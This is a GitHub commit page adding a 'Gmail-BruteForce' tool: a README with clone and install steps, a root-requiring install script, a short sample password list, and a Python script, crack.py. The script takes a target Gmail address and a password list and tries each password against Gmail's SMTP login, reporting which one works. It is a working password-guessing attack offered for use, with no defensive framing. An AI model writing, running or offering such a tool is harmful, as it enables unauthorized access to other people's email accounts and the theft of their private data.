-
Notifications
You must be signed in to change notification settings - Fork 14
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
ea58a57
commit 79e8f5a
Showing
4 changed files
with
136 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
# Gmail-Brute Force | ||
<hr> | ||
|
||
This Programm Write by [Mr.nope](https://github.com/mrprogrammer2938) | ||
<br> | ||
|
||
``` | ||
.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----. | ||
| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__} | ||
| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__} | ||
`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----' | ||
``` | ||
<br> | ||
|
||
|
||
**Installing** | ||
``` | ||
git clone https://github.com/mrprogrammer2938/Gmail-BruteForce | ||
cd Gmail-BruteForce | ||
bash install.sh | ||
python3 crack.py | ||
``` | ||
|
||
|
||
### [Mr.nope](https://github.com/mrprogrammer2938) Account... | ||
|
||
[Instagram](https://instagram.com/mr.programmer2938) | ||
|
||
[Pinterest](https://www.pinterest.com/mrprogrammer2938) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,71 @@ | ||
#!/usr/bin/python3 | ||
# This Programm Write by Mr.nope | ||
# Gmail-Brute Force v1.4.3 | ||
import os | ||
import time | ||
import sys | ||
import platform | ||
try: | ||
import smtplib | ||
from email.message import EmailMessage | ||
except ImportError: | ||
os.system("pip3 install smtplib") | ||
import smtplib | ||
from email.message import EmailMessage | ||
try: | ||
from colorama import Fore,init | ||
init() | ||
except ImportError: | ||
os.system("pip3 install colorama") | ||
system = platform.uname()[0] | ||
End = '\033[0m' | ||
Run_Err = "\nPlease, Run This Programm on Linux or MacOS!\n" | ||
banner = Fore.GREEN + """ | ||
.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----. """ + Fore.CYAN + " :)" + Fore.GREEN + """ | ||
| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__} | ||
| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__} | ||
`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----' | ||
""" + End | ||
def main(): | ||
os.system("printf '\033]2;Gmail-Brute Force\a'") | ||
os.system("clear") | ||
print(banner) | ||
Addr = input("\nEnter Gmail Address: ") | ||
time.sleep(0.35) | ||
pass_file = input("\nEnter Passlist: ") | ||
time.sleep(0.51) | ||
passlist = open(pass_file,"r").read().split() | ||
for Password in passlist: | ||
try: | ||
with smtplib.SMTP_SSL('smtp.gmail.com',465) as s: | ||
s.login(Addr,Password) | ||
print(f"Password: {Password} Found!") | ||
except smtplib.SMTPAuthenticationError: | ||
print(f"{Password} Not Found!") | ||
time.sleep(1) | ||
try1() | ||
def try1(): | ||
try_to_exit = input("\npress Enter...") | ||
if try_to_exit == '': | ||
ext() | ||
else: | ||
ext() | ||
This comment has been minimized.
Sorry, something went wrong. |
||
def ext(): | ||
print(Fore.GREEN + "Exiting..." + End) | ||
sys.exit() | ||
if __name__ == '__main__': | ||
try: | ||
try: | ||
if system == 'Linux': | ||
main() | ||
else: | ||
print(Run_Err) | ||
sys.exit() | ||
except KeyboardInterrupt: | ||
print("\nCtrl + C") | ||
print("\nExiting...") | ||
sys.exit() | ||
except EOFError: | ||
print("\nCtrl + D") | ||
print("\nExiting...") | ||
sys.exit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
#!/usr/bin/env bash | ||
# This Programm Write by Mr.nope | ||
# Gmail-Brute Force v1.4.3 | ||
if [[ "$(id -u)" -ne 0 ]]; then | ||
echo " | ||
Please, Run This Programm as Root!" | ||
exit 1 | ||
fi | ||
function main() { | ||
printf '\033]2;Gmail-Brute Force\a' | ||
clear | ||
echo " | ||
Installing..." | ||
chmod +x crack.py | ||
sleep 2 | ||
apt install python | ||
apt install python3 | ||
apt install python3-pip | ||
pip3 install --upgrade pip | ||
echo " | ||
Finish ;) | ||
Usage: | ||
python3 crack.py | ||
" | ||
exit 1 | ||
} | ||
main |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
12345 | ||
54321 | ||
abc | ||
|
||
... Please, enter passlist ;) |
Hun